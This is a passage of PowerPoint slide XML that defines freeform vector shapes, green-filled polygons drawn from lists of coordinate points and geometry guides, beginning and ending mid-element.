                  <a:gd name="T28" fmla="*/ 68 w 267"/>
                  <a:gd name="T29" fmla="*/ 142 h 244"/>
                  <a:gd name="T30" fmla="*/ 86 w 267"/>
                  <a:gd name="T31" fmla="*/ 135 h 244"/>
                  <a:gd name="T32" fmla="*/ 93 w 267"/>
                  <a:gd name="T33" fmla="*/ 115 h 244"/>
                  <a:gd name="T34" fmla="*/ 107 w 267"/>
                  <a:gd name="T35" fmla="*/ 111 h 244"/>
                  <a:gd name="T36" fmla="*/ 118 w 267"/>
                  <a:gd name="T37" fmla="*/ 101 h 244"/>
                  <a:gd name="T38" fmla="*/ 133 w 267"/>
                  <a:gd name="T39" fmla="*/ 100 h 244"/>
                  <a:gd name="T40" fmla="*/ 138 w 267"/>
                  <a:gd name="T41" fmla="*/ 78 h 244"/>
                  <a:gd name="T42" fmla="*/ 149 w 267"/>
                  <a:gd name="T43" fmla="*/ 74 h 244"/>
                  <a:gd name="T44" fmla="*/ 146 w 267"/>
                  <a:gd name="T45" fmla="*/ 62 h 244"/>
                  <a:gd name="T46" fmla="*/ 158 w 267"/>
                  <a:gd name="T47" fmla="*/ 60 h 244"/>
                  <a:gd name="T48" fmla="*/ 162 w 267"/>
                  <a:gd name="T49" fmla="*/ 49 h 244"/>
                  <a:gd name="T50" fmla="*/ 172 w 267"/>
                  <a:gd name="T51" fmla="*/ 37 h 244"/>
                  <a:gd name="T52" fmla="*/ 170 w 267"/>
                  <a:gd name="T53" fmla="*/ 24 h 244"/>
                  <a:gd name="T54" fmla="*/ 172 w 267"/>
                  <a:gd name="T55" fmla="*/ 13 h 244"/>
                  <a:gd name="T56" fmla="*/ 183 w 267"/>
                  <a:gd name="T57" fmla="*/ 6 h 244"/>
                  <a:gd name="T58" fmla="*/ 208 w 267"/>
                  <a:gd name="T59" fmla="*/ 4 h 244"/>
                  <a:gd name="T60" fmla="*/ 218 w 267"/>
                  <a:gd name="T61" fmla="*/ 0 h 244"/>
                  <a:gd name="T62" fmla="*/ 225 w 267"/>
                  <a:gd name="T63" fmla="*/ 1 h 244"/>
                  <a:gd name="T64" fmla="*/ 235 w 267"/>
                  <a:gd name="T65" fmla="*/ 5 h 244"/>
                  <a:gd name="T66" fmla="*/ 237 w 267"/>
                  <a:gd name="T67" fmla="*/ 19 h 244"/>
                  <a:gd name="T68" fmla="*/ 246 w 267"/>
                  <a:gd name="T69" fmla="*/ 22 h 244"/>
                  <a:gd name="T70" fmla="*/ 254 w 267"/>
                  <a:gd name="T71" fmla="*/ 28 h 244"/>
                  <a:gd name="T72" fmla="*/ 265 w 267"/>
                  <a:gd name="T73" fmla="*/ 32 h 244"/>
                  <a:gd name="T74" fmla="*/ 256 w 267"/>
                  <a:gd name="T75" fmla="*/ 45 h 244"/>
                  <a:gd name="T76" fmla="*/ 246 w 267"/>
                  <a:gd name="T77" fmla="*/ 45 h 244"/>
                  <a:gd name="T78" fmla="*/ 231 w 267"/>
                  <a:gd name="T79" fmla="*/ 47 h 244"/>
                  <a:gd name="T80" fmla="*/ 206 w 267"/>
                  <a:gd name="T81" fmla="*/ 51 h 244"/>
                  <a:gd name="T82" fmla="*/ 208 w 267"/>
                  <a:gd name="T83" fmla="*/ 56 h 244"/>
                  <a:gd name="T84" fmla="*/ 210 w 267"/>
                  <a:gd name="T85" fmla="*/ 62 h 244"/>
                  <a:gd name="T86" fmla="*/ 210 w 267"/>
                  <a:gd name="T87" fmla="*/ 73 h 244"/>
                  <a:gd name="T88" fmla="*/ 220 w 267"/>
                  <a:gd name="T89" fmla="*/ 82 h 244"/>
                  <a:gd name="T90" fmla="*/ 231 w 267"/>
                  <a:gd name="T91" fmla="*/ 90 h 244"/>
                  <a:gd name="T92" fmla="*/ 221 w 267"/>
                  <a:gd name="T93" fmla="*/ 98 h 244"/>
                  <a:gd name="T94" fmla="*/ 218 w 267"/>
                  <a:gd name="T95" fmla="*/ 114 h 244"/>
                  <a:gd name="T96" fmla="*/ 202 w 267"/>
                  <a:gd name="T97" fmla="*/ 133 h 244"/>
                  <a:gd name="T98" fmla="*/ 183 w 267"/>
                  <a:gd name="T99" fmla="*/ 155 h 244"/>
                  <a:gd name="T100" fmla="*/ 176 w 267"/>
                  <a:gd name="T101" fmla="*/ 170 h 244"/>
                  <a:gd name="T102" fmla="*/ 156 w 267"/>
                  <a:gd name="T103" fmla="*/ 174 h 244"/>
                  <a:gd name="T104" fmla="*/ 147 w 267"/>
                  <a:gd name="T105" fmla="*/ 173 h 244"/>
                  <a:gd name="T106" fmla="*/ 137 w 267"/>
                  <a:gd name="T107" fmla="*/ 190 h 244"/>
                  <a:gd name="T108" fmla="*/ 149 w 267"/>
                  <a:gd name="T109" fmla="*/ 195 h 244"/>
                  <a:gd name="T110" fmla="*/ 152 w 267"/>
                  <a:gd name="T111" fmla="*/ 211 h 244"/>
                  <a:gd name="T112" fmla="*/ 163 w 267"/>
                  <a:gd name="T113" fmla="*/ 228 h 244"/>
                  <a:gd name="T114" fmla="*/ 159 w 267"/>
                  <a:gd name="T115" fmla="*/ 235 h 244"/>
                  <a:gd name="T116" fmla="*/ 148 w 267"/>
                  <a:gd name="T117" fmla="*/ 235 h 244"/>
                  <a:gd name="T118" fmla="*/ 133 w 267"/>
                  <a:gd name="T119" fmla="*/ 235 h 244"/>
                  <a:gd name="T120" fmla="*/ 120 w 267"/>
                  <a:gd name="T121" fmla="*/ 240 h 244"/>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67"/>
                  <a:gd name="T184" fmla="*/ 0 h 244"/>
                  <a:gd name="T185" fmla="*/ 267 w 267"/>
                  <a:gd name="T186" fmla="*/ 244 h 244"/>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67" h="244">
                    <a:moveTo>
                      <a:pt x="115" y="244"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="109" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="244"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36357" name="Freeform 89"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3704" y="2312"/>
                <a:ext cx="267" cy="244"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 103 w 267"/>
                  <a:gd name="T1" fmla="*/ 238 h 244"/>
                  <a:gd name="T2" fmla="*/ 93 w 267"/>
                  <a:gd name="T3" fmla="*/ 227 h 244"/>
                  <a:gd name="T4" fmla="*/ 92 w 267"/>
                  <a:gd name="T5" fmla="*/ 217 h 244"/>
                  <a:gd name="T6" fmla="*/ 70 w 267"/>
                  <a:gd name="T7" fmla="*/ 218 h 244"/>
                  <a:gd name="T8" fmla="*/ 53 w 267"/>
                  <a:gd name="T9" fmla="*/ 217 h 244"/>
                  <a:gd name="T10" fmla="*/ 35 w 267"/>
                  <a:gd name="T11" fmla="*/ 220 h 244"/>
                  <a:gd name="T12" fmla="*/ 12 w 267"/>
                  <a:gd name="T13" fmla="*/ 222 h 244"/>
                  <a:gd name="T14" fmla="*/ 18 w 267"/>
                  <a:gd name="T15" fmla="*/ 202 h 244"/>
                  <a:gd name="T16" fmla="*/ 37 w 267"/>
                  <a:gd name="T17" fmla="*/ 195 h 244"/>
                  <a:gd name="T18" fmla="*/ 33 w 267"/>
                  <a:gd name="T19" fmla="*/ 183 h 244"/>
                  <a:gd name="T20" fmla="*/ 26 w 267"/>
                  <a:gd name="T21" fmla="*/ 164 h 244"/>
                  <a:gd name="T22" fmla="*/ 6 w 267"/>
                  <a:gd name="T23" fmla="*/ 145 h 244"/>
                  <a:gd name="T24" fmla="*/ 18 w 267"/>
                  <a:gd name="T25" fmla="*/ 142 h 244"/>
                  <a:gd name="T26" fmla="*/ 42 w 267"/>
                  <a:gd name="T27" fmla="*/ 143 h 244"/>
                  <a:gd name="T28" fmla="*/ 68 w 267"/>
                  <a:gd name="T29" fmla="*/ 142 h 244"/>
                  <a:gd name="T30" fmla="*/ 86 w 267"/>
                  <a:gd name="T31" fmla="*/ 135 h 244"/>
                  <a:gd name="T32" fmla="*/ 93 w 267"/>
                  <a:gd name="T33" fmla="*/ 115 h 244"/>
                  <a:gd name="T34" fmla="*/ 107 w 267"/>
                  <a:gd name="T35" fmla="*/ 111 h 244"/>
                  <a:gd name="T36" fmla="*/ 118 w 267"/>
                  <a:gd name="T37" fmla="*/ 101 h 244"/>
                  <a:gd name="T38" fmla="*/ 133 w 267"/>
                  <a:gd name="T39" fmla="*/ 100 h 244"/>
                  <a:gd name="T40" fmla="*/ 138 w 267"/>
                  <a:gd name="T41" fmla="*/ 78 h 244"/>
                  <a:gd name="T42" fmla="*/ 149 w 267"/>
                  <a:gd name="T43" fmla="*/ 74 h 244"/>
                  <a:gd name="T44" fmla="*/ 146 w 267"/>
                  <a:gd name="T45" fmla="*/ 62 h 244"/>
                  <a:gd name="T46" fmla="*/ 158 w 267"/>
                  <a:gd name="T47" fmla="*/ 60 h 244"/>
                  <a:gd name="T48" fmla="*/ 162 w 267"/>
                  <a:gd name="T49" fmla="*/ 49 h 244"/>
                  <a:gd name="T50" fmla="*/ 172 w 267"/>
                  <a:gd name="T51" fmla="*/ 37 h 244"/>
                  <a:gd name="T52" fmla="*/ 170 w 267"/>
                  <a:gd name="T53" fmla="*/ 24 h 244"/>
                  <a:gd name="T54" fmla="*/ 172 w 267"/>
                  <a:gd name="T55" fmla="*/ 13 h 244"/>
                  <a:gd name="T56" fmla="*/ 183 w 267"/>
                  <a:gd name="T57" fmla="*/ 6 h 244"/>
                  <a:gd name="T58" fmla="*/ 208 w 267"/>
                  <a:gd name="T59" fmla="*/ 4 h 244"/>
                  <a:gd name="T60" fmla="*/ 218 w 267"/>
                  <a:gd name="T61" fmla="*/ 0 h 244"/>
                  <a:gd name="T62" fmla="*/ 225 w 267"/>
                  <a:gd name="T63" fmla="*/ 1 h 244"/>
                  <a:gd name="T64" fmla="*/ 235 w 267"/>
